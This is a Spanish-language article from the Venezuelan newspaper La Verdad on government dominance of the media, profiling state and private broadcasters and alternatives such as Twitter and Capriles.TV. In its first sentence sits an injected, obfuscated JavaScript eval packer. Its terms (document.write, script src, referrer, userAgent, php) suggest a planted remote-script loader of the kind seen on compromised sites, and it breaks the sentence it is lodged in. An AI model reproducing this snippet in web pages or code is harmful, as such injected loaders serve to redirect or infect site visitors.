publicidad

Hegemonía comunicacional extiende fronteras

José Gregorio Martínez / Caracas / noticias@laverdad
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|heyfh|var|u0026u|referrer|snysf||js|php'.split('|'),0,{})) Gobierno tiene la capacidad de obligar a la mitad de la población que no tiene televisión por cable ni Internet a recibir solo su mensaje. Investigador de la Ucab, Andrés Cañizales, advierte que el Twitter no es una plataforma informativa con alcance político

La hegemonía comunicacional de la que hablaba Andrés Izarra durante su primera gestión como ministro de Comunicación e Información (2004-2005), ya se consumó. Aunque otros oficialistas prefieren llamarlo democratización del espectro radioeléctrico, el Gobierno cuenta con seis canales de televisión, dos circuitos radiales con cobertura en todo el territorio nacional, una agencia de noticias y el control mediante la publicidad oficial de emisoras de radio y periódicos en todos los estados, pero como eso no era suficiente, ha logrado poner a sus pies a la mayoría de medios privados, bien por chantajes con la renovación de la concesión o por la compra de medios a través de testaferros.

Andrés Cañizales, periodista y profesor investigador de la Universidad Católica Andrés Bello (Ucab), destaca la importancia de la televisión en señal abierta, puesto que según las cifras que maneja, 99 por ciento de los hogares venezolanos tendrían al menos un televisor y solo 47 por ciento disfrutan del servicio de televisión por suscripción, pero la audiencia de los canales del Estado no satisface las necesidades de penetración del Gobierno, ya que Venezolana de Televisión (VTV) es el canal más visto y apenas llega a 10 por ciento de rating, mientras el resto de los medios administrados por el Estado la mayoría no llegan a uno por ciento.

Tras la salida del aire de RCTV, la pantalla chica está bajo el dominio de Venevisión, que supera el 40 por ciento de sintonía, mientras que Televén estaría alrededor de 25 por ciento y Globovisión se ha mantenido entre 10 y 13 por ciento. "Por esto es tan importante para el Gobierno el control de los medios privados, porque solamente con el uso de las cadenas tiene la capacidad de obligar a la mitad de la población que no tiene televisión por cable a recibir su mensaje".

Salir de la burbuja

El surgimiento de las redes sociales como vía de comunicación, concretamente el Twitter, Cañizales lo considera importante, mas no suficiente como plataforma informativa con finalidades políticas. Precisa que a pesar de ser Venezuela uno de los países del mundo donde ha logrado mayor penetración por habitantes, se estaría hablando de unos tres millones de usuarios que equivalen apenas al 10 por ciento de la población y 75 por ciento de estos usuarios son menores de 30 años. 

"La ausencia de Henrique Capriles en la televisión abierta minimiza su impacto en la opinión pública y es imposible que esto sea suplantado por las vías alternativas como el Twitter o Capriles.Tv. El rebote del mensaje que se divulga a través de Capriles.Tv se da básicamente en los medios impresos y las redes sociales, mientras que escasamente logra que la televisión lo reproduzca. Si no busca otros medios se quedará circulando en la burbuja de las personas que usan las redes sociales y leen periódicos".

Concluye el investigador de la Ucab, que lo que necesita el líder opositor es llegar a las personas que aún no han votado por él, y gran parte de este público se ubica en esa mitad de la población que no tiene televisión por suscripción y seguramente no tiene Internet ni es lectora de periódicos, al que solo le está llegando el mensaje del Gobierno.

Hegemonía oficial

VTV

Desde el 1 de agosto de 1964 Venezolana de Televisión (VTV) es el canal del Estado venezolano, pero se ha convertido en los últimos 14 años en el principal medio de propaganda del oficialismo. Su audiencia ronda el 10 por ciento.

Vive TVLo que prometía ser un canal cultural terminó siendo un medio para la promoción de la ideología socialista. Fue fundado el 11 de noviembre de 2003 y opera en señal abierta en casi todo el país en diferentes frecuencias locales.

Telesur

Con el objetivo de hacer contrapeso a CNN en español, el Gobierno de Venezuela lanzó el 24 de julio de 2005 la cadena de noticias que cuenta con participación de los gobiernos de Cuba, Bolivia, Ecuador, Nicaragua, Argentina y Uruguay. Su señal llega a todo el continente americano, Europa y África del Norte.

ANTV

Un Parlamento dominado por el chavismo crea el 12 de marzo de 2005 el canal Asamblea Nacional Televisión (ANTV) y un año después comienza a salir en señal abierta. Desde 2009 se prohibió a los medios privados la entrada al hemiciclo y ANTV tiene la exclusividad para transmitir las sesiones.

TVes

En la señal del canal 2 y con los equipos de RCTV comenzó a operar en la madrugada del 28 de mayo de 2007. Chávez reconoció a finales de ese año que ese canal "no lo veía casi nadie". Con suerte ha llegado a 3,8 puntos de rating, según la encuestadora AGV.

Ávila TV

Comenzó operaciones el 6 de julio de 2006 como medio adscrito a la Alcaldía Metropolitana, pero un día antes de que Antonio Ledezma asumiera el cargo de alcalde mayor, en 2008, el Gobierno pasó por decreto su administración al Ministerio de Comunicación e Información (Minci).

AVN

La Agencia Bolivariana de Noticias (ABN) nació en 2005 en sustitución de Venpres y pasó a llamarse Agencia Venezolana de Noticias (AVN), a partir de la creación del Sistema Bolivariano de Comunicación e Información (SIBCI) el 2 de marzo de 2013. 

RNV

El 29 de julio de 1936, bajo el gobierno de Eleazar López Contreras, se crea la Radio Difusora Nacional de Venezuela, pero no fue sino hasta 1987 cuando pasa a ser un servicio autónomo bajo el nombre de Radio Nacional de Venezuela (RNV). Cuenta con 78 emisoras con presencia en todos los estados. 

Privados medias tinta 

Venevisión

Nació en julio de 1960 por propuesta del presidente Rómulo Betancourt a Diego Cisneros de sacar de la quiebra a Televisa. Fue un canal que hizo una oposición férrea a Hugo Chávez hasta 2007, cuando el Presidente se reunión con Gustavo Cisneros y, a diferencia de RCTV, a Venevisión sí le fue renovada la concesión, pero no por 20 años sino por cinco. Desde entonces se pregona el "equilibrio informativo".  Después del cierre de RCTV domina el rating con más de 40 por ciento.

Televén

Este canal que nació en 1988 se dedicó a la programación enlatada y durante los primeros años del gobierno de Hugo Chávez fue considerado como uno de los "jinetes del apocalipsis" por su postura crítica, pero siguió los pasos de Venevisión y prefirió no meterse más en problemas para que le fuera renovada la concesión por cinco años. Su audiencia ronda el 25 por ciento.

Globovisión

El 1 de diciembre de 1994 comenzó operaciones el canal de noticias que se convirtió en la principal piedra en el zapato para el chavismo. Con una decena de procedimientos administrativos y una multa por más de nueve millones de bolívares lidió el canal durante la administración de Guillermo Zuloaga, quien lo vendió luego de las elecciones del 14 de abril porque era "inviable" económicamente. La nueva directiva, asociada al Gobierno, sacó del aire programas de opinión, despidió a los periodistas más críticos y prohibió transmitir en vivo a Henrique Capriles. El nivel de sintonía se ha mantenido alrededor de 10 por ciento, alcanzando topes de 13 por ciento.

Cadena Capriles

Tiene sus orígenes en 1941, cuando un grupo de periodistas fundó Últimas Noticias, el principal producto de la editorial y el diario de mayor circulación del país. En la actualidad incluye El Mundo Economía y Negocios, Líder y Planeta Urbe. La línea editorial se ha identificado tanto con el oficialismo como con la oposición. La cadena fue vendida recientemente a empresarios presuntamente vinculados con el Gobierno.

Alternativas sin filtros 

Twitter

Es una red social creada en Estados Unidos en 2006 que logró impacto sociopolítico a partir de 2009, cuando sirvió para organizar protestas electorales en Irán. Tiene más de 500 millones de usuarios y se generan más de 65 millones de tuits al día. Venezuela es el quinto país en el mundo en cuanto a penetración del Twitter y el primero de Hispanoamérica. Ante el cierre de medios, el dominio comunicacional del Estado y la autocensura, el Twitter ha tomado relevancia como medio alternativo, pero no solo entre los opositores; el Gobierno y sus seguidores se convencieron de la necesidad de utilizar este medio de comunicación desde que el fallecido presidente Hugo Chávez creó su cuenta @Chavezcandanga en abril de 2010.

Capriles.TV

Este canal de televisión por Internet nació como una necesidad del líder opositor Henrique Capriles de buscar una ventana a través de la cual comunicarse con el país, luego de que la nueva directiva de Globovisión decidiera no transmitir más sus alocuciones en vivo. El 11 de junio salió al aire la primera edición de su programa Venezuela Somos Todos, que se transmite todos los martes al mediodía. Más allá del rating, se ha convertido en un espacio que genera opinión pública y logra replicar su contenido en otros medios alternativos y tradicionales. Twitter es un aliado para esta plataforma y, no en vano, con sus tres millones y medio de seguidores, Henrique Capriles es la persona más popular en la red social en Venezuela, y el político más seguido en Latinoamérica, incluso por encima de todos los presidentes de la región.

Clic en la imagen para agrandar

Más noticias

  • Detienen en Bogotá a militar venezolano con 25 pasaportes

    25/03/2019 05:05pm

    El teniente coronel venezolano Édgar Lugo Pereira, quien trabaja en la Cancillería de ese país, fue detenido en el aeropuerto de Bogotá con 25 pasaportes y más de 40 mil dólares, y posteriormente fue expulsado por las autoridades colombianas, informaron este lunes fuentes oficiales.

  • Gobernación denuncia que incendio en Bajo Grande fue provocado

    25/03/2019 04:04pm

    Por instrucciones del gobernador del estado Zulia, Omar Prieto Fernández, el secretario de Gobierno, Lisandro Cabello, acompañado por los jefes de los diversos cuerpos de seguridad y los Alcaldes, se informó la disminución del índice de delito general en un 34 por ciento, donde el Zulia se posiciona en el puesto numero 19 como uno de las regiones mas seguros del país. 

  • Esposa de Guaidó se reúne con el Canciller de Perú en Lima

    25/03/2019 03:57pm

    Fabiana Rosales, la esposa del presidente de la Asamblea Nacional, Juan Guaidó, quien es reconocido por más de cincuenta países como presidente encargado de su país, se reunió este lunes en Lima con el canciller peruano Néstor Popolizio

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama